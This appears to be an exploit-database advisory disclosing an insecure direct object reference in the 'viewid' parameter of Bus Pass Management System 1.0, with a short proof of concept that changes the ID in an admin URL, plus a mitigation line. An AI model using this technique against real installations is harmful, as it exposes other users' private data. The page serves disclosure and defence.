Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)

vendor:

Bus Pass Management System

by:

sudoninja

8,8

CVSS

HIGH

Insecure direct object references (IDOR)

639

CWE

Product Name: Bus Pass Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:bus_pass_management_system

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10 - XAMPP Server

2021

Bus Pass Management System 1.0 – ‘viewid’ Insecure direct object references (IDOR)

The viewid paramater is vulnerable to Insecure direct object references (IDOR). An attacker can exploit this vulnerability by changing the viewid parameter in the URL to access sensitive information of other users.

Mitigation:

The application should validate the user input and restrict access to sensitive information based on user privileges.

Source

Exploit-DB raw data:

# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
# Date: 2021-09-05
# Exploit Author: sudoninja
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server

# Vulnerable page :

http://localhost/buspassms/admin/view-pass-detail.php?viewid=4

# Vulnerable paramater :

The viewid paramater is Vulnerable to Insecure direct object references (IDOR)

# Proof Of Concept :

# 1 . Download And install [ bus-pass-management-system ]
# 2 . Go to /admin/index.php and Enter Username & Password 
# 3 . Navigate to search >> search pass
# 4 . Click on the view and enter the change viewid into the Url

Use :
http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]